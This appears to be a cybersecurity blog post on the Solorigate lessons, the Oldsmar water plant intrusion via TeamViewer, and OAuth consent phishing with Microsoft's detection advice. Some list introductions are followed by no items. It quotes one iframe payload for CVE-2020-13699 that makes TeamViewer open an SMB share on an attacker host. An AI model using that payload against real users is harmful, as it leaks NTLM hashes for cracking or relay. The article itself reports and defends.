Weinert further said that the threat actor behind Solorigate took advantage of broad role assignments, permissions that exceeded role requirements, and in some cases abandoned accounts and applications which should have had no permissions at all.
Applying the lessons from the Solorigate attack and the principles of Zero Trust, Microsoft recommends enabling multi-factor authentication (MFA) to reduce account compromise probability by more than 99.9%. It's important to note that attackers, however, have their ways of bypassing MFA nowadays.
Remote Access Security Risks and Best Practices to Counter These Risks
The recent cyber incident in which someone tried to poison the water supply of the city of Oldsmar, Florida highlights the security risks of remote access.
Pinellas County Sheriff Bob Gualtieri, in a press conference held last week, said that someone remotely accessed one of the computers of the city’s water treatment system and increased the amount of sodium hydroxide to a level that could have caused serious harm to the city’s 15,000 residents.
A small concentration of sodium hydroxide is used by the city’s water treatment system to control the water acidity. The high concentration of this chemical, however, causes severe burns and permanent damage to any tissue that it comes in contact with. Gualtieri said that the city’s water supply wasn’t adversely affected as a supervisor, who was also working remotely, noticed the unauthorized change and immediately reverted the chemical concentration to the old level.
Gualtieri told WIRED and Reuters that the threat actor who made the unauthorized change to the concentration of sodium hydroxide gained remote access to the water treatment plant's computer system via TeamViewer – an app that allows a user to gain access to computers and networks remotely. This app is specifically used for desktop sharing.
The security vulnerability, designated as CVE-2020-13699, in TeamViewer for Windows platform was discovered last year by Jeffrey Hofmann, security engineer at Praetorian. Hofmann said the affected versions were versions 8 to 15 of the TeamViewer for Windows platform.
“An attacker could embed a malicious iframe in a website with a crafted URL (<iframe src='teamviewer10: --play \\attacker-IP\share\fake.tvs'>)that would launch the TeamViewer Windows desktop client and force it to open a remote SMB share,” Hofmann said. “Windows will perform NTLM authentication when opening the SMB share and that request can be relayed (using a tool like responder) for code execution (or captured for hash cracking).”
An attacker exploiting this vulnerability could force a victim to send an NTLM authentication request and capture the hash for offline password cracking. In response to the disclosure made by Hofmann, TeamViewer issued updates to TeamViewer versions 8 to 15 for the Windows platform. "We implemented some improvements in URI handling relating to CVE 2020-13699,” TeamViewer said in a statement.
It’s unclear whether the updates issued by TeamViewer were applied by the concerned personnel of the city’s water treatment system. According to the Cybersecurity and Infrastructure Security Agency (CISA), early information indicates that it’s possible that TeamViewer may have been used to gain unauthorized access to the water treatment system. This, however, can’t be confirmed at present date, CISA said.
“TeamViewer, a desktop sharing software, is a legitimate popular tool that has been exploited by cyber actors engaged in targeted social engineering attacks, as well as large scale, indiscriminate phishing campaigns,” CISA said. “Desktop sharing software can also be used by employees with vindictive and/or larcenous motivations against employers. Beyond its legitimate uses, when proper security measures aren’t followed, remote access tools may be used to exercise remote control over computer systems and drop files onto victim computers, making it functionally similar to Remote Access Trojans (RATs). TeamViewer’s legitimate use, however, makes anomalous activity less suspicious to end users and system administrators compared to RATs.”
Other Poor Cybersecurity Practices
As a result of the cyber incident at Oldsmar's water treatment system, the State of Massachusetts issued a cybersecurity advisory for public water suppliers. The advisory issued by the State of Massachusetts said, "All computers used by water plant personnel were connected to the SCADA system and used the 32-bit version of the Windows 7 operating system.”
Microsoft ended its support for the Windows 7 operating system on January 14, 2020. End of support, in this case, means end of security updates and technical support. Users of Windows 7 Professional and Enterprise versions, however, can avail of the Extended Security Update (ESU) plan (paid per-device) until January 2023. It isn’t clear whether Oldsmar’s water treatment system availed of the ESU plan.
The cybersecurity advisory further said, “Further, all computers shared the same password for remote access and appeared to be connected directly to the Internet without any type of firewall protection installed.”
Cybersecurity Best Practices
While remote access comes with known risks, remote access has become a necessity as a result of the lockdown restrictions. There’s also an upside with remote access. In the case of the cyber incident at Oldsmar's water treatment system, the unauthorized change was immediately reversed due to remote access as well.
Here are some of the lessons learned out of the cyber incident at Oldsmar's water treatment system:
As a large number of the world’s workforce shifted to working from home, attackers have turned their attention to this new group of remote workforce by leveraging the cyberattack called “consent phishing” to gain access to valuable data in cloud services.
What Is Consent Phishing?
Consent phishing is a cyberattack in which an attacker lures a victim to click on a malicious app. This malicious app masquerades as a legitimate app, tricking the victim to give consent to such malicious app and giving the attacker access to the victim’s sensitive data or other resources.
In the blog post "Protecting your remote workforce from application-based attacks like consent phishing," Agnieszka Girling, Partner Group PM Manager at Microsoft warned about consent phishing. While each consent phishing attack tends to vary, Girling said, the basic steps typically follow these steps:
First, an attacker registers a malicious app with an OAuth 2.0 provider, such as Azure Active Directory.
Second, the malicious app is developed in such a way that it appears, at first glance, as legitimate through the use of the name and logo of a popular product.
Third, the attacker tricks a victim to click on a malicious link. The malicious link is delivered by email, website, or other techniques.
Fourth, the victim clicks the malicious link and is asked to grant the malicious app permissions.
Fifth, once the victim grants the malicious app permissions, the malicious app gets an authorization code which it redeems for an access token, and potentially a refresh token.
Sixth, the access token is then used to access a cloud service on behalf of the victim.
Consent phishing is also known as OAuth phishing as this type of cyberattack abuses the OAuth protocol – an authentication protocol that allows websites and applications to request limited access to a user's cloud account without the need for a password. With OAuth, instead of a password, an authorization token is used to authenticate.
Real-Life Example of Consent Phishing Attack
PhishLabs reported that an attacker used a malicious Microsoft 365 app to gain access to a victim’s legitimate Microsoft 365 account. According to PhishLabs, the attacker presented the link of the malicious Microsoft 365 app via a traditional phishing message impersonating an internal SharePoint and OneDrive file-share.
PhishLabs said that the link provided led to a Microsoft 365 legitimate login page. After the victim logged in or if previously logged in, the victim was then presented with the Microsoft 365 access permissions request. Access approval granted the attacker full control of the victim’s Microsoft 365 account.
According to PhishLabs, the Microsoft 365 app was created using the information of a legitimate organization. “This is likely due to the organization having been previously compromised, allowing attackers to leverage their development credentials in building the app,” PhishLabs said.
Cybersecurity Best Practices Against Consent Phishing
In consent phishing attacks, the typical remediation steps such as resetting passwords or requiring Multi-Factor Authentication (MFA) on accounts aren’t effective as the malicious apps are external to the organization.
According to Microsoft, consent phishing attacks “leverage an interaction model which presumes the entity that is calling the information is automation and not a human.”
Microsoft recommends the following measures to detect and remediate consent phishing attacks targeting your organization’s Microsoft cloud environment:
Detect Malicious Apps Using Alerts
OAuth policies can be set automatically to send notifications when an OAuth app meets certain criteria. For instance, an OAuth policy can be set to send a notification when an OAuth app requires high permissions and was authorized by more than 50 users.
Detect Malicious Apps by Hunting
In detecting malicious apps by hunting, OAuth apps are reviewed based on suspicious name or suspicious publisher.
“Misleading names, such as foreign letters that resemble Latin letters, could indicate an attempt to disguise a malicious app as a known and trusted app,” Microsoft said. “Misleading publisher names, such as foreign letters that resemble Latin letters, could indicate an attempt to disguise a malicious app as an app coming from a known and trusted publisher.”
Once it’s determined that the OAuth app is malicious, the following remediations can be undertaken:
Steve E. Driz, I.S.P., ITCP